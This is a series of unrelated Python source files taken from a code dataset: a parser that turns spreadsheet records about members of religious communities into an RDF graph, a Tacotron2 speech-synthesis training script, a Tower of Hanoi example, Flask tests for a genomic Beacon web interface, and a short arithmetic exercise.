Nampi_type.Mona.member_of_a_religious_community_visiting,\r\n \"Religious life outside a community\": Nampi_type.Mona.religious_life_outside_a_community,\r\n \"Office in a diocese\": Nampi_type.Mona.office_in_a_diocese,\r\n \"Secular office\": Nampi_type.Mona.secular_office,\r\n \"Educator\": Nampi_type.Mona.educator,\r\n \"Office\": Nampi_type.Mona.office,\r\n \"Ruler of a school\": Nampi_type.Mona.ruler_of_a_school,\r\n \"Status\": Nampi_type.Core.status,\r\n \"Aspect\": Nampi_type.Core.aspect,\r\n \"Unspecified aspect\": Nampi_type.Mona.unspecified_aspect,\r\n}\r\n\r\n_occupation_types = {\r\n \"Administration of a community\": Nampi_type.Mona.administration_of_a_community,\r\n \"Associated parish clergy\": Nampi_type.Mona.associated_parish_clergy,\r\n \"Clergy\": Nampi_type.Mona.clergy,\r\n \"Official\": Nampi_type.Mona.official,\r\n \"Trade\": Nampi_type.Mona.trade,\r\n \"Rule of a community\": Nampi_type.Mona.rule_of_a_community,\r\n \"Monastic office\": Nampi_type.Mona.monastic_office,\r\n \"Secular office\": Nampi_type.Mona.secular_office,\r\n \"Office in a diocese\": Nampi_type.Mona.office_in_a_diocese,\r\n \"Office\": Nampi_type.Mona.office,\r\n \"Educator\": Nampi_type.Mona.educator,\r\n \"Servant\": Nampi_type.Mona.servant,\r\n \"Visitator\": Nampi_type.Mona.visitator,\r\n \"Highly skilled professional\": Nampi_type.Mona.highly_skilled_professional,\r\n \"Rule of a school\": Nampi_type.Mona.rule_of_a_school,\r\n \"Occupation\": Nampi_type.Core.occupation,\r\n \"Aspect\": Nampi_type.Core.aspect,\r\n \"Unspecified aspect\": Nampi_type.Mona.unspecified_aspect,\r\n}\r\n\r\nauthors = [\"Stephan Makowski\", \"Manuela Mayer\", \"Andrea Singh Bottanova\", \"Patrick Fiska\", \"Irene Rabl\"]\r\n\r\n\r\ndef safe_str(row: Series, column: str) -> Optional[str]:\r\n return str(row[column]) if column in row else None\r\n\r\n\r\nEntities_dict = {}\r\n\r\n\r\nclass Nampi_data_entry_form_parser_josephis:\r\n \"\"\"A parser that parses the NAMPI input tables and transforms the data to an RDF graph.\"\"\"\r\n\r\n _graph: Nampi_graph\r\n _stati: {}\r\n _occupation: {}\r\n\r\n # Get all Entries from Group_Entities Spreadsheet\r\n def getEntities(self):\r\n logging.info(\"Getting Group_Entites\")\r\n\r\n # Extract and print all of the values\r\n list_of_hashes = GetTypesAndStati(\"Josephis\").getData()\r\n print(\"--Start analyzing 'Josephis_Überarbeitungsformular_ASB' --\")\r\n i = 0\r\n for val in list_of_hashes:\r\n Entry = Entity_Importer_Josephis()\r\n Entry.ExactCite = val[\"Exaktes Zitat\"]\r\n Entry.Enable = val[\"Aufnehmen (x)\"].strip()\r\n Entry.RelTitle = val[\"Religious title\"]\r\n Entry.Forename = val[\"Vorname(n)\"]\r\n Entry.Surename = val[\"Nachname\"]\r\n Entry.Deathdate = val[\"Todesdatum\"]\r\n Entry.Deathdateearly = val[\"Todesdatum (frühest)\"]\r\n Entry.Deathdatelate = val[\"Todesdatum (spätest)\"]\r\n Entry.Deathplace = val[\"Todesort\"]\r\n Entry.DeathplaceGeo = val[\"geonames Todesort (populated place)\"]\r\n Entry.IssuePlace = val[\"Wirkungsort\"]\r\n Entry.IssuePlacegeo = val[\"geonames Wirkungsort (populated place)\"]\r\n Entry.Community = val[\"Group/Community\"]\r\n Entry.Status = val[\"Status (mehrere durch % trennen)\"]\r\n Entry.Status_Nampi = val[\"Status_nampi (name)\"]\r\n Entry.Occupation = val[\"Occupation (mehrere durch % trennen)\"]\r\n Entry.Occupation_Nampi = val[\"Occupation_nampi (name)\"]\r\n Entry.Event = val[\"Eventdefinition_nampi (name)\"]\r\n Entry.Cite = val[\"Zitation (Jahr und Tagesdatum)\"]\r\n Entry.GND = val[\"GND\"]\r\n Entry.Comment = val[\"Kommentar\"]\r\n Entry.Source = val[\"Quellenangabe\"]\r\n\r\n Entities_dict[i] = Entry\r\n i = i + 1\r\n\r\n logging.info(\"Finished Getting Group_Entities\")\r\n print(\"--Ready with 'Josephis_Überarbeitungsformular_ASB' --\")\r\n\r\n def createJosephis(self):\r\n print(\"-- Create entries --\")\r\n logging.info(\"-- Create entries --\")\r\n for index in Entities_dict:\r\n Entry = Entity_Importer_Josephis()\r\n Entry = Entities_dict[index]\r\n\r\n # Just do stuff, if Enable == \"X\"\r\n if Entry.Enable.upper() == \"X\":\r\n\r\n # Person\r\n Comment = Entry.Comment\r\n persName = Entry.Forename + \" \" + Entry.Surename\r\n print(\"Create entry: \" + persName)\r\n logging.info(\"-- Create entry: --\" + persName)\r\n person = self.__get_person(persName, Entry.GND)\r\n if Comment:\r\n person.add_comment(Comment)\r\n\r\n # check if Deathdate is valid\r\n date = Entry.Deathdate\r\n datefirst = Entry.Deathdateearly\r\n datelast = Entry.Deathdatelate\r\n\r\n # Geburt / inits\r\n family_names = Entry.Surename\r\n date_value = \"\"\r\n\r\n # Exaktes Datum ist vorhanden. Ansonsten letzt verfügbares Datum nehmen\r\n if len(date) > 0:\r\n date_value = date\r\n elif len(datelast) > 0:\r\n date_value = datelast\r\n\r\n birth = Birth(\r\n self._graph,\r\n person,\r\n latest_date=date_value,\r\n family_name_label=family_names,\r\n )\r\n birth.add_text(Entry.ExactCite, \"la\")\r\n self.__insert_di_act(\r\n birth,\r\n (),\r\n authors,\r\n Entry.Source,\r\n Entry.Cite,\r\n self._d1,\r\n )\r\n family = Family(self._graph, family_names)\r\n aspect = Aspect(self._graph, family_names)\r\n\r\n # Nur wenn Nachname gefüllt\r\n if len(family_names) != 0:\r\n become_member_event = Event(\r\n self._graph,\r\n person,\r\n Nampi_type.Core.has_main_participant,\r\n label=\"Become family member\",\r\n )\r\n become_member_event.add_relationship(\r\n Nampi_type.Core.adds_aspect, aspect\r\n )\r\n become_member_event.add_relationship(\r\n Nampi_type.Core.changes_aspect_related_to, family\r\n )\r\n logging.debug(\"Added 'membership' in family \")\r\n\r\n self.__insert_di_act(\r\n become_member_event,\r\n (),\r\n authors,\r\n Entry.Source,\r\n Entry.Cite,\r\n self._d1,\r\n )\r\n\r\n # Tod\r\n\r\n # Exaktes Datum / Datum frühestens / Datum spätestens\r\n death = self.add_deaths(\r\n persName,\r\n (),\r\n Entry.Deathplace,\r\n Entry.DeathplaceGeo,\r\n Entry.Cite,\r\n datefirst,\r\n date,\r\n datelast,\r\n Entry.Source,\r\n )\r\n\r\n # Wenn Event vorhanden, schreiben\r\n if death:\r\n death.add_text(Entry.ExactCite, \"la\")\r\n self.__insert_di_act(\r\n death,\r\n (),\r\n authors,\r\n Entry.Source,\r\n Entry.Cite,\r\n self._d1,\r\n )\r\n\r\n cite = Entry.Cite\r\n # Titel\r\n if Entry.RelTitle:\r\n RelTitle = Event(\r\n self._graph,\r\n person,\r\n latest_date=date\r\n , label=\"Get title \" + Entry.RelTitle\r\n )\r\n RelTitle.add_text(Entry.ExactCite, \"la\")\r\n title = Title(\r\n self._graph, Entry.RelTitle, Nampi_type.Mona.religious_title\r\n )\r\n\r\n RelTitle.add_relationship(\r\n obj=person, pred=Nampi_type.Core.has_main_participant\r\n )\r\n RelTitle.add_relationship(\r\n obj=title, pred=Nampi_type.Core.adds_aspect\r\n )\r\n self.__insert_di_act(\r\n RelTitle,\r\n (),\r\n authors,\r\n Entry.Source,\r\n Entry.Cite,\r\n self._d1,\r\n )\r\n\r\n # Inits\r\n PlaceArray = \"\"\r\n PlaceGeoArray = \"\"\r\n GroupArray = \"\"\r\n StatusArray = \"\"\r\n StatusNampiArray = \"\"\r\n OccupationArray = \"\"\r\n OccupationNampiArray = \"\"\r\n EventArray = \"\"\r\n\r\n # Place\r\n if Entry.IssuePlace.find(\"%\"):\r\n PlaceArray = Entry.IssuePlace.split(\"%\")\r\n\r\n if str(Entry.IssuePlacegeo).find(\"%\"):\r\n PlaceGeoArray = str(Entry.IssuePlacegeo).split(\"%\")\r\n\r\n # Community\r\n if Entry.Community.find(\"%\"):\r\n GroupArray = Entry.Community.split(\"%\")\r\n\r\n # Status\r\n if Entry.Status.find(\"%\"):\r\n StatusArray = Entry.Status.split(\"%\")\r\n\r\n # Status Nampi\r\n if Entry.Status_Nampi.find(\"%\"):\r\n StatusNampiArray = Entry.Status_Nampi.split(\"%\")\r\n\r\n # Occupation\r\n if Entry.Occupation.find(\"%\"):\r\n OccupationArray = Entry.Occupation.split(\"%\")\r\n\r\n # Occupation_Nampi\r\n if Entry.Occupation_Nampi.find(\"%\"):\r\n OccupationNampiArray = Entry.Occupation_Nampi.split(\"%\")\r\n\r\n # Event\r\n if Entry.Event.find(\"%\"):\r\n EventArray = Entry.Event.split(\"%\")\r\n\r\n for (i, val) in enumerate(GroupArray):\r\n\r\n Group = self.__get_group(\r\n \"Monastic community\",\r\n GroupArray[i].replace('\"', \"\"),\r\n GroupArray[i].replace('\"', \"\"),\r\n )\r\n\r\n if len(PlaceArray) > i and len(PlaceGeoArray) > i:\r\n Place = self.__get_place(\r\n PlaceArray[i].strip(), PlaceGeoArray[i].split(\" \")[0]\r\n )\r\n strPlace = PlaceArray[i].strip()\r\n elif len(PlaceArray) > 0 and len(PlaceGeoArray) > 0:\r\n Place = self.__get_place(\r\n PlaceArray[-1].strip(), PlaceGeoArray[-1].split(\" \")[0]\r\n )\r\n strPlace = PlaceArray[-1].strip()\r\n else:\r\n Place = \"\"\r\n strPlace = \"\"\r\n\r\n if len(EventArray) > i:\r\n varEvent = EventArray[i]\r\n elif len(EventArray) > 0:\r\n varEvent = EventArray[-1]\r\n else:\r\n varEvent = \"\"\r\n\r\n if len(StatusArray) > i:\r\n varStatus = StatusArray[i]\r\n elif len(StatusArray) > 0:\r\n varStatus = StatusArray[-1]\r\n else:\r\n varStatus = \"\"\r\n\r\n if len(StatusNampiArray) > i:\r\n varStatusNampi = StatusNampiArray[i]\r\n elif len(StatusNampiArray) > 0:\r\n varStatusNampi = StatusNampiArray[-1]\r\n else:\r\n varStatusNampi = \"\"\r\n\r\n varStatusNampi = varStatusNampi.strip()\r\n if len(OccupationArray) > i is not None:\r\n varOccupation = OccupationArray[i]\r\n elif len(OccupationArray) > 0:\r\n varOccupation = OccupationArray[-1]\r\n\r\n if len(OccupationNampiArray) > i is not None:\r\n varOccupation_Nampi = OccupationNampiArray[i]\r\n elif len(OccupationNampiArray) > 0:\r\n varOccupation_Nampi = OccupationNampiArray[-1]\r\n\r\n if len(varStatusNampi.strip()) > 0:\r\n\r\n if self._stati.getValues()[varStatusNampi.strip()][\"Type\"]:\r\n type = self._stati.getValues()[varStatusNampi.strip()][\r\n \"Type\"\r\n ]\r\n\r\n varStatusType = _status_types[type]\r\n\r\n # if self._occupation.getValues()[varStatusNampi.strip()][\"Type\"]:\r\n # type = self._stati.getValues()[varOccupation_Nampi.strip()][\"Type\"]\r\n\r\n # varOccupationType = _occupation_types[type]\r\n\r\n event = None\r\n\r\n if len(date) > 0:\r\n\r\n event = Event(\r\n self._graph,\r\n person,\r\n Nampi_type.Core.has_main_participant,\r\n varEvent,\r\n (),\r\n Place,\r\n latest_date=date,\r\n )\r\n event.add_text(Entry.ExactCite, \"la\")\r\n\r\n elif len(datelast) > 0:\r\n\r\n event = Event(\r\n self._graph,\r\n person,\r\n Nampi_type.Core.has_main_participant,\r\n varEvent,\r\n (),\r\n Place,\r\n earliest_date=datefirst,\r\n latest_date=datelast,\r\n )\r\n event.add_text(Entry.ExactCite, \"la\")\r\n\r\n aspect_label = \"\"\r\n occupation_type = \"\"\r\n if (\r\n varStatusNampi or varOccupation_Nampi\r\n ) and varStatusNampi == varOccupation_Nampi:\r\n aspect_label == varOccupation_Nampi\r\n status_type = varStatusType\r\n occupation_type = \"\" # varOccupationType\r\n types: List[URIRef] = []\r\n if status_type:\r\n types.append(status_type)\r\n if occupation_type:\r\n types.append(occupation_type)\r\n\r\n if event is not None:\r\n aspect = Aspect(self._graph, aspect_label, types)\r\n\r\n event.add_relationship(\r\n obj=person, pred=Nampi_type.Core.has_main_participant\r\n )\r\n if Group:\r\n event.add_relationship(\r\n obj=Group,\r\n pred=Nampi_type.Core.changes_aspect_related_to,\r\n )\r\n event.add_relationship(\r\n obj=aspect, pred=Nampi_type.Core.adds_aspect\r\n )\r\n else:\r\n if len(varStatusNampi.strip()) > 0:\r\n status_type = varStatusType\r\n aspect_label == varOccupation_Nampi\r\n if event is not None:\r\n\r\n if status_type is None:\r\n status_type = Nampi_type.Core.aspect\r\n\r\n aspect = Aspect(\r\n self._graph, varStatusNampi, status_type\r\n )\r\n event.add_relationship(\r\n obj=person,\r\n pred=Nampi_type.Core.has_main_participant,\r\n )\r\n if Group:\r\n event.add_relationship(\r\n obj=Group,\r\n pred=Nampi_type.Core.changes_aspect_related_to,\r\n )\r\n event.add_relationship(\r\n obj=aspect, pred=Nampi_type.Core.adds_aspect\r\n )\r\n\r\n elif varOccupation_Nampi:\r\n occupation_type = \"\" # varOccupationType\r\n if event is not None:\r\n aspect = Aspect(\r\n self._graph, varOccupation_Nampi, occupation_type\r\n )\r\n event.add_relationship(\r\n obj=person,\r\n pred=Nampi_type.Core.has_main_participant,\r\n )\r\n if Group:\r\n event.add_relationship(\r\n obj=Group,\r\n pred=Nampi_type.Core.changes_aspect_related_to,\r\n )\r\n event.add_relationship(\r\n obj=aspect, pred=Nampi_type.Core.adds_aspect\r\n )\r\n\r\n if event:\r\n self.__insert_di_act(\r\n event,\r\n (),\r\n authors,\r\n Entry.Source,\r\n cite,\r\n self._d1,\r\n )\r\n\r\n print(\"Create entry: \" + persName + \" ready\")\r\n\r\n def __init__(self, graph: Nampi_graph):\r\n \"\"\"Initialize the class.\r\n\r\n Parameters:\r\n graph: The data graph.\r\n \"\"\"\r\n self._graph = graph\r\n today = date.today()\r\n self._d1 = today.strftime(\"%Y-%m-%d\")\r\n self._stati = GetTypesAndStati(\"Statuses\")\r\n self._occu = GetTypesAndStati(\"Occupations\")\r\n self.getEntities()\r\n\r\n def add_deaths(\r\n self,\r\n singleperson,\r\n deathday,\r\n deathplace,\r\n deathgeo,\r\n cite,\r\n deathearlist,\r\n deathexact,\r\n deathlatest,\r\n source,\r\n ):\r\n \"\"\"\r\n Add all death events from the deaths table.\r\n \"\"\"\r\n\r\n died_person = self.__get_person(singleperson, ())\r\n\r\n if not died_person:\r\n return\r\n death_place = self.__get_place(deathplace.strip(), deathgeo)\r\n\r\n if len(deathday) > 0:\r\n death = Death(self._graph, died_person, death_place, exact_date=deathexact)\r\n elif len(deathlatest) > 0:\r\n death = Death(\r\n self._graph,\r\n died_person,\r\n death_place,\r\n earliest_date=deathearlist,\r\n latest_date=deathlatest,\r\n )\r\n else:\r\n death = None\r\n\r\n if death:\r\n self.__insert_di_act(\r\n death,\r\n (),\r\n authors,\r\n source,\r\n cite,\r\n self._d1,\r\n )\r\n\r\n logging.info(\"Parsed the deaths\")\r\n\r\n def __get_group(\r\n self, group_type_desc, group_label: Optional[str], part_of_label\r\n ) -> Optional[Group]:\r\n if not group_label:\r\n return None\r\n group_type_label = group_label\r\n group_type = _group_types[group_type_desc]\r\n part_of_group = (\r\n self.__get_group(part_of_label, (), ()) if part_of_label else None\r\n )\r\n group = Group(self._graph, group_label, group_type)\r\n if part_of_group:\r\n group.add_relationship(Nampi_type.Core.is_part_of, part_of_group)\r\n return group\r\n\r\n def __get_person(\r\n self, person_label: Optional[str], gnd_id: Optional[str]\r\n ) -> Optional[Person]:\r\n\r\n if gnd_id and str(gnd_id).upper() != \"KEINE\":\r\n if str(gnd_id).find(\" \"):\r\n gnd_split = str(gnd_id).split(\" \")\r\n gnd_id_split = gnd_split[0]\r\n gnd = \"http://d-nb.info/gnd/\" + str(gnd_id_split).strip()\r\n else:\r\n gnd = \"http://d-nb.info/gnd/\" + str(gnd_id).strip()\r\n else:\r\n gnd = \"\"\r\n gender = \"\"\r\n\r\n return Person.optional(self._graph, person_label, gender, gnd)\r\n\r\n def __get_place(\r\n self, place_label: Optional[str], geoid: Optional[str]\r\n ) -> Optional[Place]:\r\n if geoid:\r\n geoname_id = str(geoid).strip()\r\n else:\r\n geoname_id = \"\"\r\n\r\n place_label = place_label.replace('\"', \"\")\r\n return Place.optional(self._graph, place_label.strip(), geoname_id, \"\")\r\n\r\n def __get_source_location(\r\n self, source_label: str, location_text: Optional[str]\r\n ) -> Source_location:\r\n source_type_text = \"Manuscript\"\r\n source_type = None\r\n if source_type_text == \"Manuscript\":\r\n source_type = Source_type.MANUSCRIPT\r\n elif source_type_text == \"Online Resource\":\r\n source_type = Source_type.ONLINE_RESOURCE\r\n if not source_type:\r\n raise ValueError(\r\n \"Could not find source type for '{}'\".format(source_type_text)\r\n )\r\n source = Source(self._graph, source_label, source_type)\r\n if len(location_text) > 0:\r\n return Source_location(self._graph, source, location_text)\r\n else:\r\n return source\r\n\r\n def __insert_di_act(\r\n self,\r\n event: Event,\r\n row: Series = pandas.Series(),\r\n author_label: str = \"\",\r\n source_label: str = \"\",\r\n source_location_label: str = \"\",\r\n interpretation_date_text: Optional[str] = None,\r\n ):\r\n author_label = author_label\r\n source_label = source_label\r\n source_location_label = source_location_label\r\n\r\n author = author_label # Author(self._graph, author_label)\r\n if not author:\r\n return None\r\n source_location = self.__get_source_location(\r\n source_label, source_location_label\r\n )\r\n interpretation_date = interpretation_date_text\r\n\r\n comment = None\r\n if comment:\r\n event.add_comment(comment)\r\n Di_act(\r\n self._graph,\r\n event,\r\n author,\r\n source_location,\r\n interpretation_date,\r\n )\r\n","sub_path":"parsers/nampi_by_josephis/nampi_data_entry_form_josephis.py","file_name":"nampi_data_entry_form_josephis.py","file_ext":"py","file_size_in_byte":26789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"68199693","text":"import os\nimport math\nimport time\nimport argparse\nimport traceback\nimport numpy as np\nimport tensorflow as tf\nfrom datetime import datetime\n\n\nfrom tfr_dset import TFDataSet\nfrom text import sequence_to_text\nfrom utils import audio, plot, infolog, ValueWindow, debug\n\nfrom sygst_hparams import hp\nfrom models.sygst_tacotron2 import Tacotron2SYGST\n\nlog = infolog.log\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\n\n\n_max_step = 500000\nhdfs_ckpts='hdfs://haruna/home/byte_speech_sv/user/caixiong/ckpts'\n\n# spec_length max = 1116\n# text length max = 99\n\n\ndef time_string():\n return datetime.now().strftime('%Y-%m-%d %H:%M')\n\n\ndef debug_data(batch=32, time_in=100, time_out=500):\n text_x = np.random.randint(0, 150, size=(batch, time_in), dtype=np.int32)\n mel = np.random.randn(batch, time_out, 80).astype(np.float32)\n spec = np.random.randn(batch, time_out, 1025).astype(np.float32)\n spec_len = np.random.randint(time_out // 2, time_out, size=batch, dtype=np.int32)\n aro_label = np.random.rand(batch, 2).astype(np.float32)\n val_label = np.random.rand(batch, 2).astype(np.float32)\n\n print('text_input:', text_x[0], 'spec_len:', spec_len, sep='\\n')\n return text_x, mel, spec, spec_len, aro_label, val_label\n\n\ndef train(log_dir, args):\n checkpoint_path = os.path.join(hdfs_ckpts, log_dir, 'model.ckpt')\n log(hp.to_string(), is_print=False)\n log('Loading training data from: %s' % args.tfr_dir)\n log('Checkpoint path: %s' % checkpoint_path)\n log('Using model: sygst tacotron2')\n\n tf_dset = TFDataSet(hp, args.tfr_dir)\n feats = tf_dset.get_train_next()\n # Set up model:\n global_step = tf.Variable(0, name='global_step', trainable=False)\n training = tf.placeholder_with_default(True, shape=(), name='training')\n with tf.name_scope('model'):\n model = Tacotron2SYGST(hp)\n model(feats['inputs'],\n mel_inputs=feats['mel_targets'],\n spec_inputs=feats['linear_targets'],\n spec_lengths=feats['spec_lengths'],\n ref_inputs=feats['mel_targets'],\n ref_lengths=feats['spec_lengths'],\n arousal_labels=feats['soft_arousal_labels'],\n valence_labels=feats['soft_valance_labels'],\n training=training)\n \"\"\"\n text_x, mel_x, spec_x, spec_len, aro, val = debug_data(2, 5, 10)\n model(text_x, mel_x, spec_x, spec_len, mel_x, spec_len, aro, val, training=training)\n \"\"\"\n model.add_loss()\n model.add_optimizer(global_step)\n stats = model.add_stats()\n\n # Bookkeeping:\n step = 0\n time_window = ValueWindow(100)\n loss_window = ValueWindow(100)\n saver = tf.train.Saver(max_to_keep=50, keep_checkpoint_every_n_hours=2)\n\n # Train!\n config = tf.ConfigProto(allow_soft_placement=True,\n gpu_options=tf.GPUOptions(allow_growth=True))\n with tf.Session(config=config) as sess:\n try:\n summary_writer = tf.summary.FileWriter(log_dir, sess.graph)\n sess.run(tf.global_variables_initializer())\n if args.restore_step:\n # Restore from a checkpoint if the user requested it.\n restore_path = '%s-%s' % (checkpoint_path, args.restore_step)\n saver.restore(sess, restore_path)\n log('Resuming from checkpoint: %s' % restore_path, slack=True)\n else:\n log('Starting a new training run ...', slack=True)\n\n \"\"\"\n fetches = [global_step, model.optimize, model.loss, model.mel_loss, model.spec_loss,\n model.stop_loss, model.arousal_loss, model.valence_loss, model.mel_grad_norms_max,\n model.spec_grad_norms_max, model.stop_grad_norms_max, model.aro_grad_norms_max, model.val_grad_norms_max]\n \"\"\"\n fetches = [global_step, model.optimize, model.loss, model.mel_loss, model.spec_loss,\n model.stop_loss, model.arousal_loss, model.valence_loss]\n for _ in range(_max_step):\n start_time = time.time()\n sess.run(debug.get_ops())\n # step, _, loss, mel_loss, spec_loss, stop_loss, aro_loss, val_loss, mel_g, spec_g, stop_g, aro_g, val_g = sess.run(fetches)\n step, _, loss, mel_loss, spec_loss, stop_loss, aro_loss, val_loss = sess.run(fetches)\n time_window.append(time.time() - start_time)\n loss_window.append(loss)\n \"\"\"\n message = 'Step %-7d [%.3f sec/step,ml=%.3f,spl=%.3f,sl=%.3f,al=%.3f,vl=%.3f,mg=%.4f,spg=%.4f,sg=%.4f,ag=%.4f,vg=%.4f]' % (\n step, time_window.average, mel_loss, spec_loss, stop_loss, aro_loss, val_loss, mel_g, spec_g, stop_g, aro_g, val_g)\n \"\"\"\n message = 'Step %-7d [%.3f sec/step,ml=%.3f,spl=%.3f,sl=%.3f,al=%.3f,vl=%.3f]' % (\n step, time_window.average, mel_loss, spec_loss, stop_loss, aro_loss, val_loss)\n log(message, slack=(step % args.checkpoint_interval == 0))\n\n if loss > 100 or math.isnan(loss):\n log('Loss exploded to %.5f at step %d!' % (loss, step), slack=True)\n raise Exception('Loss Exploded')\n\n if step % args.summary_interval == 0:\n log('Writing summary at step: %d' % step)\n try:\n summary_writer.add_summary(sess.run(stats), step)\n except Exception as e:\n log(f'summary failed and ignored: {str(e)}')\n\n if step % args.checkpoint_interval == 0:\n log('Saving checkpoint to: %s-%d' % (checkpoint_path, step))\n saver.save(sess, checkpoint_path, global_step=step)\n log('Saving audio and alignment...')\n gt_mel, gt_spec, seq, mel, spec, align = sess.run([model.mel_targets[0], model.spec_targets[0],\n model.text_targets[0], model.mel_outputs[0],\n model.spec_outputs[0], model.alignment_outputs[0]])\n text = sequence_to_text(seq)\n wav = audio.inv_spectrogram(hp, spec.T)\n wav_path = os.path.join(log_dir, 'step-%d-audio.wav' % step)\n mel_path = os.path.join(log_dir, 'step-%d-mel.png' % step)\n spec_path = os.path.join(log_dir, 'step-%d-spec.png' % step)\n align_path = os.path.join(log_dir, 'step-%d-align.png' % step)\n info = '%s, %s, step=%d, loss=%.5f\\n %s' % (args.model, time_string(), step, loss, text)\n plot.plot_alignment(align, align_path, info=info)\n plot.plot_mel(mel, mel_path, info=info, gt_mel=gt_mel)\n plot.plot_mel(spec, spec_path, info=info, gt_mel=gt_spec)\n audio.save_wav(hp, wav, wav_path)\n log('Input: %s' % text)\n\n except Exception as e:\n log('Exiting due to exception: %s' % e, slack=True)\n traceback.print_exc()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', default='0')\n parser.add_argument('--log', '-l', default='')\n parser.add_argument('--restore_step', '-r', default=None)\n parser.add_argument('--tfr_dir', default='bc2013/training/tfrs_with_emo_feature')\n args = parser.parse_args()\n\n args.model = 'sygst_taco2'\n args.summary_interval = 200\n args.checkpoint_interval = 5000\n # args.summary_interval = 2\n # args.checkpoint_interval = 5\n\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu\n log_dir = 'sygst_logs' + ('_' + args.log if args.log else '')\n os.makedirs(log_dir, exist_ok=True)\n\n tf.set_random_seed(hp.random_seed)\n infolog.init(os.path.join(log_dir, 'train.log'), args.model)\n\n train(log_dir, args)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sygst_train.py","file_name":"sygst_train.py","file_ext":"py","file_size_in_byte":8065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"30662993","text":"iteration = 0\ndef hanoi(N, A, C, B,iteration):\n\n if N==0: return\n\n hanoi(N - 1, A, B, C,iteration)\n\n print(\"Move the disk \",N,\" from \",A,\" to \",C)\n\n hanoi(N - 1, B, C, A,iteration)\n\nhanoi(3,'A','C','B',0)","sub_path":"towerOfHanoi.py","file_name":"towerOfHanoi.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441233409","text":"from . import test_image\nimport requests_mock\nimport pytest # noqa\nimport re\n\n\ndef test_home(client):\n rv = client.get(\"http://localhost:4000/\")\n b_true_chr = re.search(rv.data.decode(\"utf-8\")[726:760], \"1\")\n b_true_pos = re.search(rv.data.decode(\"utf-8\")[889:892], \"1\")\n b_true_ref = re.search(rv.data.decode(\"utf-8\")[1010:1017], \"A\")\n b_true_alt = re.search(rv.data.decode(\"utf-8\")[1137:1144], \"A\")\n\n b_false_chr = re.search(rv.data.decode(\"utf-8\")[726:760], \"Z\")\n b_false_ref = re.search(rv.data.decode(\"utf-8\")[1010:1017], \"Z\")\n b_false_alt = re.search(rv.data.decode(\"utf-8\")[1137:1144], \"Z\")\n\n assert b_true_chr\n assert b_true_pos\n assert b_true_ref\n assert b_true_alt\n\n assert b_false_chr is None\n assert b_false_ref is None\n assert b_false_alt is None\n\n assert \"Beacon\" in rv.data.decode(\"utf-8\")\n assert \"SWP\" in rv.data.decode(\"utf-8\")\n assert \"Submit\" in rv.data.decode(\"utf-8\")\n assert rv.status_code == 200\n\n\ninput_handle_correct = [\n ({\"chr\": \"1\", \"pos\": \"1\", \"ref\": \"A\", \"alt\": \"A\", \"occ\": True, \"error\": None}),\n ({\"chr\": \"1\", \"pos\": \"1\", \"ref\": \"A\", \"alt\": \"A\", \"occ\": False, \"error\": None}),\n ({\"chr\": \"1\", \"pos\": \"1\", \"ref\": \"A\", \"alt\": \"A\", \"occ\": None, \"error\": None}),\n (\n {\n \"chr\": \"1\",\n \"pos\": \"1\",\n \"ref\": \"A\",\n \"alt\": \"A\",\n \"occ\": True,\n \"error\": None,\n \"statistic\": test_image.IMG_B64,\n }\n ),\n (\n {\n \"chr\": \"1\",\n \"pos\": \"1\",\n \"ref\": \"A\",\n \"alt\": \"A\",\n \"occ\": True,\n \"error\": None,\n \"statistic\": None,\n }\n ),\n]\n\n\n@pytest.mark.parametrize(\"outdic\", input_handle_correct)\n@requests_mock.Mocker(kw=\"mock\")\ndef test_handle_correct(outdic, client, monkeypatch, demo_db_path, **kwargs):\n kwargs[\"mock\"].post(\"http://localhost:5000/query\", json=outdic)\n\n rv = client.post(\n \"http://localhost:4000/results\",\n data={\"token\": \"\", \"chr\": \"1\", \"pos\": \"1\", \"ref\": \"A\", \"alt\": \"A\"},\n follow_redirects=True,\n )\n assert rv.status_code == 200\n assert b\"Results\" in rv.data\n assert (\n b\"Your variant 1-1-A-A was found.\"\n or b\"Your variant 1-1-A-A was not found.\"\n or b\"An Error has occured: no such table: variants\" in rv.data\n )\n assert b\"go Home\" in rv.data\n\n rt = client.post(\n \"/results\",\n data={\"token\": \"ValidToken\", \"chr\": \"1\", \"pos\": \"1\", \"ref\": \"A\", \"alt\": \"A\"},\n )\n assert b\"Results\" in rt.data\n assert (\n b\"Your variant 1-1-A-A was found.\"\n or b\"Your variant 1-1-A-A was not found.\"\n or b\"An Error has occured: no such table: variants\" in rt.data\n )\n assert b\"go Home\" in rt.data\n assert rt.status_code == 200\n\n\ninput_login = [\n (\"Valid\", \"ValidToken\", True, None),\n (None, \"NoneValidToken\", False, None),\n (None, \"ErrorToken\", None, \"Error\"),\n (None, None, None, \"Error\"),\n]\n\n\n@pytest.mark.parametrize(\"username,token,valid,error\", input_login)\n@requests_mock.Mocker(kw=\"mock\")\ndef test_login(username, token, valid, error, client, **kwargs):\n kwargs[\"mock\"].post(\n \"http://localhost:5000/api/verify\",\n json={\"verified\": valid, \"user\": username, \"error\": error},\n )\n rv = client.post(\"/login\", data=dict(token=token), follow_redirects=True)\n assert rv.status_code == 200\n assert b\"SWP\" in rv.data\n assert b\"Beacon\" in rv.data\n assert b\"Login\" in rv.data\n\n rg = client.get(\"/login\")\n assert rg.status_code == 200\n assert b\"SWP\" in rg.data\n assert b\"Beacon\" in rg.data\n assert b\"Login\" in rg.data\n assert b\"Cancel\" in rg.data\n","sub_path":"tests/test_web_ui.py","file_name":"test_web_ui.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"289791687","text":"#11. b, f, h\nliczba1=5\nliczba2=1\nliczba3=8\nliczba4=6\nliczba5=3\nsuma =(liczba1**2+liczba2**2+liczba3**2+liczba4**2+liczba5**2)\nprint (\"Odpowiedź do b: \")\nprint (suma)\n\n","sub_path":"01-TypesAndVariables/During 